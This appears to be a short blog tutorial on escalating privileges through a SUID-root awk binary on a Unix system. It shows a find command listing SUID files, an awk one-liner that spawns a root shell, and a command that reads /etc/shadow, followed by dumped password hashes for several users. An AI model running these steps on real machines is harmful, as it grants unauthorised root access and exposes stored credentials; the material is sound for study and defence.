Suid binary exploitation involves a binary with its SUID bit set so that any thing executed by the program will do so with privelges of that user. First we search for suid binarys in the root of the filesystem.
sam@asus:~% find / -user root -perm -4000 -exec ls -ldb {} \;
-r-sr-xr-x 1 root bin 38836 Aug 10 16:16 /usr/bin/at
-rwsr-xr-x 1 root root 11288 Nov 19 11:29 /usr/bin/awk
-r-sr-xr-x 1 root bin 19812 Aug 10 16:16 /usr/bin/crontab
---s--x--x 1 root sys 46040 Aug 10 15:18 /usr/bin/ct
-r-sr-xr-x 1 root sys 12092 Aug 11 01:29 /usr/lib/mv_dir
-r-sr-sr-x 1 root bin 33208 Aug 10 15:55 /usr/lib/lpadmin
-r-sr-sr-x 1 root bin 38696 Aug 10 15:55 /usr/lib/lpsched
---s--x--- 1 root rar 45376 Aug 18 15:11 /usr/rar/bin/sh
-r-sr-xr-x 1 root bin 12524 Aug 11 01:27 /usr/bin/df
-rwsr-xr-x 1 root sys 21780 Aug 11 01:27 /usr/bin/newgrp
-r-sr-sr-x 1 root sys 23000 Aug 11 01:27 /usr/bin/passwd
-r-sr-xr-x 1 root sys 23824 Aug 11 01:27 /usr/bin/su
...
sam@asus:~%
We can see the AWK programming has `-rwsr` instead of `-rwxr` signifying the suid bit is set on the AWK program. We also see that it is root:root meaning any instruction we pass to AWK will be ran under root privileges.
sam@asus:~% ls -la /usr/bin/awk -rwsr-xr-x 1 root root 1911288 Nov 19 11:29 /usr/bin/awk sam@asus:~%next we can use the AWK program to try and spawn a simple shell with the awk system() function call.
sam@asus:~% id uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin) sam@asus:~%
Lets issue our shell command and check our uid/gid stats afterward.
sam@asus:~% awk 'BEGIN{system("/bin/sh")}'
# id
uid=1000(sam) gid=1000(sam) euid=0(root) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
#
And of course we raid the /etc/shadow file for password hashes.
# cut -d: -f1,2 /etc/shadow ... root:$6$uGqhP09J$cDygxAzkw0gMFeTJsyhTfyYsqY2JPkx6wyJ3gJ6Xgr5aIMUeUZ0gjnaw.GPRQSTuV5ep1gBdcjnlC85GzirU9. sam:$6$m0baQXyk$o3gxkMH4aI1M5IGJWWI.SBcrpKhcutuPt98O3UtQ8wljLuGmTsX5YKzaDsJSX65g14hf76kVLNZVvPPzVJRV4/ evelyn:$6$mJ3sgN0Q$ex3hiPuSebIvKbVLFFbDvUy.CrZowiSf1g/HAR78hLI8pFMG.WO9wma9dnA45MrIDYpdXtMV2CXK8EXAo6ix61 price:$6$G7zo0DN0$Ob9ro9/fMXYNja40VsbcPCh6AHg9UDGg01Lv33H1eRw.QiB8/kQ0WVbs8yz59w38BwHsJpRCbvN1tquj9exlT. ralph:$6$GGNFUI3s$bBf5FuCP6cbe2f881sLi2kO1woWqM58wzLGSy72mtLTs4KI/ok7CA4rtHNFXUpd7FHYWfnpQyN0tUCvvqK5qm0 lester:$6$l1ULRsYG$b0eBdMJx8eniZ0UMYlYVyC5O8aUDDg5NWMumLEqO8yowvEbKS/uIhDKjjbEXJ3vvokvhrDs47BSbWpr151tld0 wylie:$6$ao/opbGp$atg67ybDl2hObBB06AcnvJpNggaxMNJ7ubsb8mXPo67qg29uZZ3oCaloiuVrhoHrbNgN0PkSINOF7OnnEr6Ac. callum:$6$b19tmwgI$NB7lXM8FwzMiV0zQOT5fOpMhmSN6Q6fHswtEHBum66/Wt9IwGR.WHbcL5vzEuCVx8woHv1w/eOF7/PxjKtHWQ. mannix:$6$2RPPrMar$DDV.sfg7/CZyV2NHsoXa2oIDI/kn3ZK4aHpIcUR59JwPsl1/JeSokDFWRvpiZymgFg1zqh2ZY919Z5D3BDlBs. # exit sam@asus:~%
Since our AWK binary suid bit is set and owned by root `euid=0(root)`, the AWK program will execute any instructions as root. this is one of many tools you can use to escalate privilges on a UNIX box if the suid bit is set.
No comments:
Post a Comment